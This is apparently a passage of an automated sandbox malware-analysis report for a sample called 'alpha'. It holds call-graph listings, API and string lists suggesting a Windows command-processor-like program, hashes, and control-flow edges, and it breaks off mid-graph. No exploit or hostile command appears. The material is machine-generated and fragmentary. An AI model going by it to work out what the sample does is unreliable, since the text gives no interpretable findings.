7ff6eb18855c ??_V@YAXPEAX 21073->21076 21077 7ff6eb18b787 21074->21077 21075 7ff6eb17b364 17 API calls 21075->21078 21076->21072 21079 7ff6eb18b795 21077->21079 21082 7ff6eb19e944 393 API calls 21077->21082 21078->21068 21078->21069 21078->21071 21078->21072 21078->21073 21078->21075 21084 7ff6eb17986d 21078->21084 21085 7ff6eb1796b4 186 API calls 21078->21085 21105 7ff6eb181fac memset 21078->21105 21132 7ff6eb17ce10 21078->21132 21182 7ff6eb185920 21078->21182 21188 7ff6eb197694 21079->21188 21082->21079 21086 7ff6eb17988c 21084->21086 21087 7ff6eb179880 ??_V@YAXPEAX 21084->21087 21085->21078 21088 7ff6eb188f80 7 API calls 21086->21088 21087->21086 21089 7ff6eb17989d 21088->21089 21089->20880 21092 7ff6eb183a90 170 API calls 21091->21092 21093 7ff6eb199064 21092->21093 21094 7ff6eb19906e 21093->21094 21095 7ff6eb199083 21093->21095 21096 7ff6eb18498c 8 API calls 21094->21096 21098 7ff6eb17cd90 166 API calls 21095->21098 21097 7ff6eb199081 21096->21097 21097->21020 21099 7ff6eb19909b 21098->21099 21099->21097 21100 7ff6eb18498c 8 API calls 21099->21100 21101 7ff6eb1990ec 21100->21101 21102 7ff6eb17ff70 2 API calls 21101->21102 21102->21097 21104 7ff6eb18ed0a DeleteProcThreadAttributeList 21103->21104 21104->21011 21106 7ff6eb18203b 21105->21106 21107 7ff6eb1820b0 21106->21107 21108 7ff6eb182094 21106->21108 21109 7ff6eb183060 171 API calls 21107->21109 21110 7ff6eb18211c 21107->21110 21111 7ff6eb1820a6 21108->21111 21112 7ff6eb173278 166 API calls 21108->21112 21109->21110 21110->21111 21113 7ff6eb182e44 2 API calls 21110->21113 21114 7ff6eb188f80 7 API calls 21111->21114 21112->21111 21116 7ff6eb182148 21113->21116 21115 7ff6eb182325 21114->21115 21115->21078 21116->21111 21117 7ff6eb182d70 3 API calls 21116->21117 21118 7ff6eb1821af 21117->21118 21119 7ff6eb17b900 166 API calls 21118->21119 21121 7ff6eb1821d0 21119->21121 21120 7ff6eb18e04a ??_V@YAXPEAX 21120->21111 21121->21120 21122 7ff6eb18221c wcsspn 21121->21122 21130 7ff6eb1822a4 ??_V@YAXPEAX 21121->21130 21124 7ff6eb17b900 166 API calls 21122->21124 21125 7ff6eb18223b 21124->21125 21125->21120 21128 7ff6eb182252 21125->21128 21126 7ff6eb17d3f0 223 API calls 21126->21130 21127 7ff6eb18e06d wcschr 21127->21128 21128->21127 21129 7ff6eb18e090 towupper 21128->21129 21131 7ff6eb18228f 21128->21131 21129->21128 21129->21131 21130->21111 21131->21126 21133 7ff6eb17d0f8 21132->21133 21153 7ff6eb17ce5b 21132->21153 21135 7ff6eb188f80 7 API calls 21133->21135 21134 7ff6eb18c860 21136 7ff6eb18c97c 21134->21136 21139 7ff6eb19ee88 390 API calls 21134->21139 21137 7ff6eb17d10a 21135->21137 21140 7ff6eb19e9b4 197 API calls 21136->21140 21137->21078 21138 7ff6eb180494 182 API calls 21138->21153 21141 7ff6eb18c879 21139->21141 21142 7ff6eb18c981 longjmp 21140->21142 21143 7ff6eb18c882 EnterCriticalSection LeaveCriticalSection 21141->21143 21144 7ff6eb18c95c 21141->21144 21145 7ff6eb18c99a 21142->21145 21150 7ff6eb17d0e3 21143->21150 21144->21136 21148 7ff6eb1796b4 186 API calls 21144->21148 21145->21133 21147 7ff6eb18c9b3 ??_V@YAXPEAX 21145->21147 21147->21133 21148->21144 21149 7ff6eb17ceaa _tell 21152 7ff6eb17d208 _close 21149->21152 21150->21078 21151 7ff6eb17cd90 166 API calls 21151->21153 21152->21153 21153->21133 21153->21134 21153->21138 21153->21145 21153->21150 21153->21151 21154 7ff6eb18c9d5 21153->21154 21156 7ff6eb17b900 166 API calls 21153->21156 21163 7ff6eb17cf33 memset 21153->21163 21165 7ff6eb17ca40 17 API calls 21153->21165 21166 7ff6eb19bfec 176 API calls 21153->21166 21167 7ff6eb17d184 wcschr 21153->21167 21168 7ff6eb18c9c9 21153->21168 21169 7ff6eb17d1a7 wcschr 21153->21169 21171 7ff6eb19778c 166 API calls 21153->21171 21172 7ff6eb180a6c 273 API calls 21153->21172 21173 7ff6eb17be00 635 API calls 21153->21173 21174 7ff6eb183448 166 API calls 21153->21174 21175 7ff6eb180580 12 API calls 21153->21175 21176 7ff6eb17cfab _wcsicmp 21153->21176 21179 7ff6eb181fac 238 API calls 21153->21179 21181 7ff6eb17d044 ??_V@YAXPEAX 21153->21181 21194 7ff6eb17df60 21153->21194 21214 7ff6eb19c738 21153->21214 21155 7ff6eb19d610 167 API calls 21154->21155 21157 7ff6eb18c9da 21155->21157 21156->21153 21158 7ff6eb18ca07 21157->21158 21160 7ff6eb19bfec 176 API calls 21157->21160 21159 7ff6eb19e91c 198 API calls 21158->21159 21162 7ff6eb18ca0c 21159->21162 21161 7ff6eb18c9f1 21160->21161 21164 7ff6eb173240 166 API calls 21161->21164 21162->21078 21163->21153 21164->21158 21165->21153 21166->21153 21167->21153 21170 7ff6eb18855c ??_V@YAXPEAX 21168->21170 21169->21153 21170->21133 21171->21153 21172->21153 21173->21153 21174->21153 21177 7ff6eb17d003 GetConsoleOutputCP GetCPInfo 21175->21177 21176->21153 21178 7ff6eb1804f4 3 API calls 21177->21178 21178->21153 21179->21153 21181->21153 21183 7ff6eb18596c 21182->21183 21184 7ff6eb185a12 21182->21184 21183->21184 21185 7ff6eb18598d VirtualQuery 21183->21185 21184->21078 21185->21184 21187 7ff6eb1859ad 21185->21187 21186 7ff6eb1859b7 VirtualQuery 21186->21184 21186->21187 21187->21184 21187->21186 21189 7ff6eb1976a3 21188->21189 21190 7ff6eb1976b7 21189->21190 21192 7ff6eb1796b4 186 API calls 21189->21192 21191 7ff6eb19e9b4 197 API calls 21190->21191 21193 7ff6eb1976bc longjmp 21191->21193 21192->21189 21195 7ff6eb17df93 21194->21195 21196 7ff6eb17dfe2 21194->21196 21195->21196 21197 7ff6eb17df9f GetProcessHeap RtlFreeHeap 21195->21197 21198 7ff6eb17e100 VirtualFree 21196->21198 21199 7ff6eb17e00b _setjmp 21196->21199 21197->21195 21197->21196 21198->21196 21200 7ff6eb17e04a 21199->21200 21207 7ff6eb17e0c3 21199->21207 21201 7ff6eb17e600 473 API calls 21200->21201 21202 7ff6eb17e073 21201->21202 21203 7ff6eb17e081 21202->21203 21204 7ff6eb17e0e0 longjmp 21202->21204 21205 7ff6eb17d250 475 API calls 21203->21205 21206 7ff6eb17e0b0 21204->21206 21208 7ff6eb17e086 21205->21208 21206->21207 21224 7ff6eb19d3fc 21206->21224 21207->21149 21208->21206 21211 7ff6eb17e600 473 API calls 21208->21211 21212 7ff6eb17e0a7 21211->21212 21212->21206 21213 7ff6eb19d610 167 API calls 21212->21213 21213->21206 21215 7ff6eb19c775 21214->21215 21220 7ff6eb19c7ab 21214->21220 21216 7ff6eb17cd90 166 API calls 21215->21216 21218 7ff6eb19c781 21216->21218 21217 7ff6eb19c8d4 21217->21153 21218->21217 21219 7ff6eb17b0d8 194 API calls 21218->21219 21219->21217 21220->21217 21220->21218 21221 7ff6eb17b6b0 170 API calls 21220->21221 21222 7ff6eb17b038 _dup2 21220->21222 21223 7ff6eb17d208 _close 21220->21223 21221->21220 21222->21220 21223->21220 21238 7ff6eb19d419 21224->21238 21225 7ff6eb18cadf 21226 7ff6eb19d576 21227 7ff6eb19d592 21226->21227 21240 7ff6eb19d555 21226->21240 21229 7ff6eb183448 166 API calls 21227->21229 21228 7ff6eb19d5c4 21231 7ff6eb183448 166 API calls 21228->21231 21233 7ff6eb19d5a5 21229->21233 21230 7ff6eb19d541 21230->21227 21234 7ff6eb19d546 21230->21234 21231->21225 21235 7ff6eb19d5ba 21233->21235 21236 7ff6eb183448 166 API calls 21233->21236 21234->21228 21234->21240 21242 7ff6eb19d36c 21235->21242 21236->21235 21238->21225 21238->21226 21238->21227 21238->21228 21238->21230 21239 7ff6eb183448 166 API calls 21238->21239 21238->21240 21241 7ff6eb19d3fc 166 API calls 21238->21241 21239->21238 21249 7ff6eb19d31c 21240->21249 21241->21238 21243 7ff6eb19d381 21242->21243 21244 7ff6eb19d3d8 21242->21244 21245 7ff6eb1834a0 166 API calls 21243->21245 21247 7ff6eb19d390 21245->21247 21246 7ff6eb183448 166 API calls 21246->21247 21247->21244 21247->21246 21248 7ff6eb1834a0 166 API calls 21247->21248 21248->21247 21250 7ff6eb183448 166 API calls 21249->21250 21251 7ff6eb19d33b 21250->21251 21252 7ff6eb19d36c 166 API calls 21251->21252 21253 7ff6eb19d343 21252->21253 21254 7ff6eb19d3fc 166 API calls 21253->21254 21271 7ff6eb19d34e 21254->21271 21255 7ff6eb19d5c2 21255->21225 21256 7ff6eb19d576 21257 7ff6eb19d592 21256->21257 21269 7ff6eb19d555 21256->21269 21259 7ff6eb183448 166 API calls 21257->21259 21258 7ff6eb19d5c4 21261 7ff6eb183448 166 API calls 21258->21261 21263 7ff6eb19d5a5 21259->21263 21260 7ff6eb19d541 21260->21257 21264 7ff6eb19d546 21260->21264 21261->21255 21262 7ff6eb19d31c 166 API calls 21262->21255 21265 7ff6eb19d5ba 21263->21265 21266 7ff6eb183448 166 API calls 21263->21266 21264->21258 21264->21269 21267 7ff6eb19d36c 166 API calls 21265->21267 21266->21265 21267->21255 21268 7ff6eb183448 166 API calls 21268->21271 21269->21262 21270 7ff6eb19d3fc 166 API calls 21270->21271 21271->21255 21271->21256 21271->21257 21271->21258 21271->21260 21271->21268 21271->21269 21271->21270 21273 7ff6eb17c4c9 21272->21273 21274 7ff6eb17c486 21272->21274 21277 7ff6eb17ff70 2 API calls 21273->21277 21279 7ff6eb17c161 21273->21279 21275 7ff6eb17c48e wcschr 21274->21275 21274->21279 21276 7ff6eb17c4ef 21275->21276 21275->21279 21278 7ff6eb17cd90 166 API calls 21276->21278 21277->21279 21280 7ff6eb17c4f9 21278->21280 21279->20890 21279->20910 21280->21279 21281 7ff6eb17c5bd 21280->21281 21282 7ff6eb17c541 21280->21282 21283 7ff6eb17d840 178 API calls 21280->21283 21281->21282 21285 7ff6eb17b6b0 170 API calls 21281->21285 21282->21279 21284 7ff6eb17ff70 2 API calls 21282->21284 21283->21280 21284->21279 21285->21282 21286->20947 21288 7ff6eb194621 21287->21288 21289 7ff6eb1772de 21287->21289 21291 7ff6eb19447b longjmp 21288->21291 21294 7ff6eb194639 21288->21294 21304 7ff6eb19475e 21288->21304 21312 7ff6eb1947e0 21288->21312 21290 7ff6eb1772eb 21289->21290 21298 7ff6eb194530 21289->21298 21299 7ff6eb194467 21289->21299 21348 7ff6eb177348 21290->21348 21295 7ff6eb194492 21291->21295 21293 7ff6eb177348 168 API calls 21297 7ff6eb194524 21293->21297 21300 7ff6eb19463e 21294->21300 21301 7ff6eb194695 21294->21301 21302 7ff6eb177348 168 API calls 21295->21302 21309 7ff6eb1772b0 168 API calls 21297->21309 21316 7ff6eb177323 21297->21316 21303 7ff6eb177348 168 API calls 21298->21303 21299->21290 21299->21295 21306 7ff6eb194475 21299->21306 21300->21291 21313 7ff6eb194654 21300->21313 21311 7ff6eb1773d4 168 API calls 21301->21311 21322 7ff6eb1944a8 21302->21322 21324 7ff6eb194549 21303->21324 21307 7ff6eb177348 168 API calls 21304->21307 21305 7ff6eb177315 21363 7ff6eb1773d4 21305->21363 21306->21291 21306->21301 21307->21312 21308 7ff6eb177348 168 API calls 21308->21305 21315 7ff6eb19480e 21309->21315 21326 7ff6eb19469a 21311->21326 21312->21293 21325 7ff6eb177348 168 API calls 21313->21325 21314 7ff6eb1945b2 21317 7ff6eb177348 168 API calls 21314->21317 21315->20985 21316->20985 21321 7ff6eb1945c7 21317->21321 21318 7ff6eb19455e 21318->21314 21327 7ff6eb177348 168 API calls 21318->21327 21319 7ff6eb1946e1 21320 7ff6eb1772b0 168 API calls 21319->21320 21331 7ff6eb194738 21320->21331 21328 7ff6eb177348 168 API calls 21321->21328 21323 7ff6eb1944e2 21322->21323 21329 7ff6eb177348 168 API calls 21322->21329 21330 7ff6eb1772b0 168 API calls 21323->21330 21324->21314 21324->21318 21337 7ff6eb177348 168 API calls 21324->21337 21325->21316 21326->21319 21338 7ff6eb1946c7 21326->21338 21339 7ff6eb1946ea 21326->21339 21327->21314 21333 7ff6eb1945db 21328->21333 21329->21323 21334 7ff6eb1944f1 21330->21334 21332 7ff6eb177348 168 API calls 21331->21332 21332->21297 21335 7ff6eb177348 168 API calls 21333->21335 21336 7ff6eb1772b0 168 API calls 21334->21336 21340 7ff6eb1945ec 21335->21340 21341 7ff6eb194503 21336->21341 21337->21318 21338->21319 21345 7ff6eb177348 168 API calls 21338->21345 21342 7ff6eb177348 168 API calls 21339->21342 21343 7ff6eb177348 168 API calls 21340->21343 21341->21316 21344 7ff6eb177348 168 API calls 21341->21344 21342->21319 21346 7ff6eb194600 21343->21346 21344->21297 21345->21319 21347 7ff6eb177348 168 API calls 21346->21347 21347->21297 21356 7ff6eb17735d 21348->21356 21349 7ff6eb173278 166 API calls 21350 7ff6eb194820 longjmp 21349->21350 21351 7ff6eb194838 21350->21351 21352 7ff6eb173278 166 API calls 21351->21352 21353 7ff6eb194844 longjmp 21352->21353 21354 7ff6eb19485a 21353->21354 21355 7ff6eb177348 166 API calls 21354->21355 21357 7ff6eb19487b 21355->21357 21356->21349 21356->21351 21362 7ff6eb1773ab 21356->21362 21358 7ff6eb177348 166 API calls 21357->21358 21359 7ff6eb1948ad 21358->21359 21360 7ff6eb177348 166 API calls 21359->21360 21361 7ff6eb1772ff 21360->21361 21361->21305 21361->21308 21364 7ff6eb177401 21363->21364 21364->21316 21365 7ff6eb177348 168 API calls 21364->21365 21366 7ff6eb19487b 21365->21366 21367 7ff6eb177348 168 API calls 21366->21367 21368 7ff6eb1948ad 21367->21368 21369 7ff6eb177348 168 API calls 21368->21369 21370 7ff6eb1948be 21369->21370 21370->21316

                                              Executed Functions

                                              Function 00007FF6EB180A6C Relevance: 53.1, APIs: 23, Strings: 7, Instructions: 605COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                              • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                              • API String ID: 3305344409-4288247545
                                              • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                              • Instruction ID: b3710c31083e347f1a9af0162cfae7917129b6058f80b41ba211ac143c5603fd
                                              • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                              • Instruction Fuzzy Hash: 1942A123A0878285EA609B2198543F967A1BF8DBB8F544135DD1ECB7F4DF3EE544830A
                                              Function 00007FF6EB17AA54 Relevance: 51.3, APIs: 24, Strings: 5, Instructions: 536COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 216 7ff6eb17aa54-7ff6eb17aa98 call 7ff6eb17cd90 219 7ff6eb18bf5a-7ff6eb18bf70 call 7ff6eb184c1c call 7ff6eb17ff70 216->219 220 7ff6eb17aa9e 216->220 221 7ff6eb17aaa5-7ff6eb17aaa8 220->221 223 7ff6eb17acde-7ff6eb17ad00 221->223 224 7ff6eb17aaae-7ff6eb17aac8 wcschr 221->224 230 7ff6eb17ad06 223->230 224->223 227 7ff6eb17aace-7ff6eb17aae9 towlower 224->227 227->223 229 7ff6eb17aaef-7ff6eb17aaf3 227->229 233 7ff6eb17aaf9-7ff6eb17aafd 229->233 234 7ff6eb18beb7-7ff6eb18bec4 call 7ff6eb19eaf0 229->234 231 7ff6eb17ad0d-7ff6eb17ad1f 230->231 237 7ff6eb17ad22-7ff6eb17ad2a call 7ff6eb1813e0 231->237 235 7ff6eb18bbcf 233->235 236 7ff6eb17ab03-7ff6eb17ab07 233->236 246 7ff6eb18bf43-7ff6eb18bf59 call 7ff6eb184c1c 234->246 247 7ff6eb18bec6-7ff6eb18bed8 call 7ff6eb173240 234->247 249 7ff6eb18bbde 235->249 239 7ff6eb17ab7d-7ff6eb17ab81 236->239 240 7ff6eb17ab09-7ff6eb17ab0d 236->240 237->221 243 7ff6eb18be63 239->243 248 7ff6eb17ab87-7ff6eb17ab95 239->248 240->243 244 7ff6eb17ab13-7ff6eb17ab17 240->244 255 7ff6eb18be72-7ff6eb18be88 call 7ff6eb173278 call 7ff6eb184c1c 243->255 244->239 250 7ff6eb17ab19-7ff6eb17ab1d 244->250 246->219 247->246 263 7ff6eb18beda-7ff6eb18bee9 call 7ff6eb173240 247->263 253 7ff6eb17ab98-7ff6eb17aba0 248->253 259 7ff6eb18bbea-7ff6eb18bbec 249->259 250->249 254 7ff6eb17ab23-7ff6eb17ab27 250->254 253->253 258 7ff6eb17aba2-7ff6eb17abb3 call 7ff6eb17cd90 253->258 254->259 261 7ff6eb17ab2d-7ff6eb17ab31 254->261 283 7ff6eb18be89-7ff6eb18be8c 255->283 258->219 269 7ff6eb17abb9-7ff6eb17abde call 7ff6eb1813e0 call 7ff6eb1833a8 258->269 265 7ff6eb18bbf8-7ff6eb18bc01 259->265 261->230 266 7ff6eb17ab37-7ff6eb17ab3b 261->266 277 7ff6eb18bef3-7ff6eb18bef9 263->277 278 7ff6eb18beeb-7ff6eb18bef1 263->278 265->231 266->265 270 7ff6eb17ab41-7ff6eb17ab45 266->270 305 7ff6eb17ac75 269->305 306 7ff6eb17abe4-7ff6eb17abe7 269->306 274 7ff6eb17ab4b-7ff6eb17ab4f 270->274 275 7ff6eb18bc06-7ff6eb18bc2a call 7ff6eb1813e0 270->275 281 7ff6eb17ab55-7ff6eb17ab78 call 7ff6eb1813e0 274->281 282 7ff6eb17ad2f-7ff6eb17ad33 274->282 294 7ff6eb18bc5a-7ff6eb18bc61 275->294 295 7ff6eb18bc2c-7ff6eb18bc4c _wcsnicmp 275->295 277->246 284 7ff6eb18befb-7ff6eb18bf0d call 7ff6eb173240 277->284 278->246 278->277 281->221 288 7ff6eb17ad39-7ff6eb17ad3d 282->288 289 7ff6eb18bc66-7ff6eb18bc8a call 7ff6eb1813e0 282->289 291 7ff6eb18be92-7ff6eb18beaa call 7ff6eb173278 call 7ff6eb184c1c 283->291 292 7ff6eb17acbe 283->292 284->246 303 7ff6eb18bf0f-7ff6eb18bf21 call 7ff6eb173240 284->303 297 7ff6eb18bcde-7ff6eb18bd02 call 7ff6eb1813e0 288->297 298 7ff6eb17ad43-7ff6eb17ad49 288->298 324 7ff6eb18bcc4-7ff6eb18bcdc 289->324 325 7ff6eb18bc8c-7ff6eb18bcaa _wcsnicmp 289->325 337 7ff6eb18beab-7ff6eb18beb6 call 7ff6eb184c1c 291->337 301 7ff6eb17acc0-7ff6eb17acc7 292->301 309 7ff6eb18bd31-7ff6eb18bd4f _wcsnicmp 294->309 295->294 304 7ff6eb18bc4e-7ff6eb18bc55 295->304 328 7ff6eb18bd04-7ff6eb18bd24 _wcsnicmp 297->328 329 7ff6eb18bd2a 297->329 307 7ff6eb18bd5e-7ff6eb18bd65 298->307 308 7ff6eb17ad4f-7ff6eb17ad68 298->308 301->301 311 7ff6eb17acc9-7ff6eb17acda 301->311 303->246 339 7ff6eb18bf23-7ff6eb18bf35 call 7ff6eb173240 303->339 319 7ff6eb18bbb3-7ff6eb18bbb7 304->319 316 7ff6eb17ac77-7ff6eb17ac7f 305->316 306->292 321 7ff6eb17abed-7ff6eb17ac0b call 7ff6eb17cd90 * 2 306->321 307->308 320 7ff6eb18bd6b-7ff6eb18bd73 307->320 322 7ff6eb17ad6d-7ff6eb17ad70 308->322 323 7ff6eb17ad6a 308->323 317 7ff6eb18bbc2-7ff6eb18bbca 309->317 318 7ff6eb18bd55 309->318 311->223 316->292 335 7ff6eb17ac81-7ff6eb17ac85 316->335 317->221 318->307 330 7ff6eb18bbba-7ff6eb18bbbd call 7ff6eb1813e0 319->330 331 7ff6eb18bd79-7ff6eb18bd8b iswxdigit 320->331 332 7ff6eb18be4a-7ff6eb18be5e 320->332 321->337 356 7ff6eb17ac11-7ff6eb17ac14 321->356 322->237 323->322 324->309 325->324 336 7ff6eb18bcac-7ff6eb18bcbf 325->336 328->329 338 7ff6eb18bbac 328->338 329->309 330->317 331->332 342 7ff6eb18bd91-7ff6eb18bda3 iswxdigit 331->342 332->330 340 7ff6eb17ac88-7ff6eb17ac8f 335->340 336->319 337->234 338->319 339->246 357 7ff6eb18bf37-7ff6eb18bf3e call 7ff6eb173240 339->357 340->340 348 7ff6eb17ac91-7ff6eb17ac94 340->348 342->332 345 7ff6eb18bda9-7ff6eb18bdbb iswxdigit 342->345 345->332 352 7ff6eb18bdc1-7ff6eb18bdd7 iswdigit 345->352 348->292 351 7ff6eb17ac96-7ff6eb17acaa wcsrchr 348->351 351->292 358 7ff6eb17acac-7ff6eb17acb9 call 7ff6eb181300 351->358 354 7ff6eb18bddf-7ff6eb18bdeb towlower 352->354 355 7ff6eb18bdd9-7ff6eb18bddd 352->355 361 7ff6eb18bdee-7ff6eb18be0f iswdigit 354->361 355->361 356->337 362 7ff6eb17ac1a-7ff6eb17ac33 memset 356->362 357->246 358->292 363 7ff6eb18be11-7ff6eb18be15 361->363 364 7ff6eb18be17-7ff6eb18be23 towlower 361->364 362->305 365 7ff6eb17ac35-7ff6eb17ac4b wcschr 362->365 366 7ff6eb18be26-7ff6eb18be45 call 7ff6eb1813e0 363->366 364->366 365->305 367 7ff6eb17ac4d-7ff6eb17ac54 365->367 366->332 368 7ff6eb17ac5a-7ff6eb17ac6f wcschr 367->368 369 7ff6eb17ad72-7ff6eb17ad91 wcschr 367->369 368->305 368->369 371 7ff6eb17ad97-7ff6eb17adac wcschr 369->371 372 7ff6eb17af03-7ff6eb17af07 369->372 371->372 373 7ff6eb17adb2-7ff6eb17adc7 wcschr 371->373 372->305 373->372 374 7ff6eb17adcd-7ff6eb17ade2 wcschr 373->374 374->372 375 7ff6eb17ade8-7ff6eb17adfd wcschr 374->375 375->372 376 7ff6eb17ae03-7ff6eb17ae18 wcschr 375->376 376->372 377 7ff6eb17ae1e-7ff6eb17ae21 376->377 378 7ff6eb17ae24-7ff6eb17ae27 377->378 378->372 379 7ff6eb17ae2d-7ff6eb17ae40 iswspace 378->379 380 7ff6eb17ae4b-7ff6eb17ae5e 379->380 381 7ff6eb17ae42-7ff6eb17ae49 379->381 382 7ff6eb17ae66-7ff6eb17ae6d 380->382 381->378 382->382 383 7ff6eb17ae6f-7ff6eb17ae77 382->383 383->255 384 7ff6eb17ae7d-7ff6eb17ae97 call 7ff6eb1813e0 383->384 387 7ff6eb17ae9a-7ff6eb17aea4 384->387 388 7ff6eb17aebc-7ff6eb17aef8 call 7ff6eb180a6c call 7ff6eb17ff70 * 2 387->388 389 7ff6eb17aea6-7ff6eb17aead 387->389 388->316 397 7ff6eb17aefe 388->397 389->388 390 7ff6eb17aeaf-7ff6eb17aeba 389->390 390->387 390->388 397->283
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.1997894138.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000004.00000002.1997884468.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997913358.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997943202.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000004.00000002.1997975484.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                              • String ID: :$:$:$:ON$OFF
                                              • API String ID: 4076514806-467788257
                                              • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                              • Instruction ID: 75b9f229bde4634299c95518699a16c7a41f6f7e85fd7f5e5896d244e9524426
                                              • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                              • Instruction Fuzzy Hash: CB22B223A0865286EB249F21D9543F96691FF4EBA8F488035D90EC77F4DF7FA444834A
                                              Function 00007FF6EB1851EC Relevance: 45.9, APIs: 15, Strings: 11, Instructions: 384COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 398 7ff6eb1851ec-7ff6eb185248 call 7ff6eb185508 GetLocaleInfoW 401 7ff6eb18ef32-7ff6eb18ef3c 398->401 402 7ff6eb18524e-7ff6eb185272 GetLocaleInfoW 398->402 403 7ff6eb18ef3f-7ff6eb18ef49 401->403 404 7ff6eb185295-7ff6eb1852b9 GetLocaleInfoW 402->404 405 7ff6eb185274-7ff6eb18527a 402->405 408 7ff6eb18ef61-7ff6eb18ef6c 403->408 409 7ff6eb18ef4b-7ff6eb18ef52 403->409 406 7ff6eb1852bb-7ff6eb1852c3 404->406 407 7ff6eb1852de-7ff6eb185305 GetLocaleInfoW 404->407 410 7ff6eb1854f7-7ff6eb1854f9 405->410 411 7ff6eb185280-7ff6eb185286 405->411 412 7ff6eb1852c9-7ff6eb1852d7 406->412 413 7ff6eb18ef75-7ff6eb18ef78 406->413 414 7ff6eb185307-7ff6eb18531b 407->414 415 7ff6eb185321-7ff6eb185343 GetLocaleInfoW 407->415 408->413 409->408 416 7ff6eb18ef54-7ff6eb18ef5f 409->416 410->401 411->410 417 7ff6eb18528c-7ff6eb18528f 411->417 412->407 420 7ff6eb18ef99-7ff6eb18efa3 413->420 421 7ff6eb18ef7a-7ff6eb18ef7d 413->421 414->415 418 7ff6eb18efaf-7ff6eb18efb9 415->418 419 7ff6eb185349-7ff6eb18536e GetLocaleInfoW 415->419 416->403 416->408 417->404 422 7ff6eb18efbc-7ff6eb18efc6 418->422 423 7ff6eb18eff2-7ff6eb18effc 419->423 424 7ff6eb185374-7ff6eb185396 GetLocaleInfoW 419->424 420->418 421->407 425 7ff6eb18ef83-7ff6eb18ef8d 421->425 426 7ff6eb18efde-7ff6eb18efe9 422->426 427 7ff6eb18efc8-7ff6eb18efcf 422->427 428 7ff6eb18efff-7ff6eb18f009 423->428 429 7ff6eb18539c-7ff6eb1853be GetLocaleInfoW 424->429 430 7ff6eb18f035-7ff6eb18f03f 424->430 425->420 426->423 427->426 431 7ff6eb18efd1-7ff6eb18efdc 427->431 432 7ff6eb18f021-7ff6eb18f02c 428->432 433 7ff6eb18f00b-7ff6eb18f012 428->433 434 7ff6eb1853c4-7ff6eb1853e6 GetLocaleInfoW 429->434 435 7ff6eb18f078-7ff6eb18f082 429->435 436 7ff6eb18f042-7ff6eb18f04c 430->436 431->422 431->426 432->430 433->432 438 7ff6eb18f014-7ff6eb18f01f 433->438 439 7ff6eb1853ec-7ff6eb18540e GetLocaleInfoW 434->439 440 7ff6eb18f0bb-7ff6eb18f0c5 434->440 437 7ff6eb18f085-7ff6eb18f08f 435->437 441 7ff6eb18f04e-7ff6eb18f055 436->441 442 7ff6eb18f064-7ff6eb18f06f 436->442 443 7ff6eb18f091-7ff6eb18f098 437->443 444 7ff6eb18f0a7-7ff6eb18f0b2 437->444 438->428 438->432 446 7ff6eb18f0fe-7ff6eb18f108 439->446 447 7ff6eb185414-7ff6eb185436 GetLocaleInfoW 439->447 445 7ff6eb18f0c8-7ff6eb18f0d2 440->445 441->442 448 7ff6eb18f057-7ff6eb18f062 441->448 442->435 443->444 449 7ff6eb18f09a-7ff6eb18f0a5 443->449 444->440 450 7ff6eb18f0d4-7ff6eb18f0db 445->450 451 7ff6eb18f0ea-7ff6eb18f0f5 445->451 454 7ff6eb18f10b-7ff6eb18f115 446->454 452 7ff6eb18543c-7ff6eb18545e GetLocaleInfoW 447->452 453 7ff6eb18f141-7ff6eb18f14b 447->453 448->436 448->442 449->437 449->444 450->451 456 7ff6eb18f0dd-7ff6eb18f0e8 450->456 451->446 457 7ff6eb18f184-7ff6eb18f18b 452->457 458 7ff6eb185464-7ff6eb185486 GetLocaleInfoW 452->458 455 7ff6eb18f14e-7ff6eb18f158 453->455 459 7ff6eb18f117-7ff6eb18f11e 454->459 460 7ff6eb18f12d-7ff6eb18f138 454->460 462 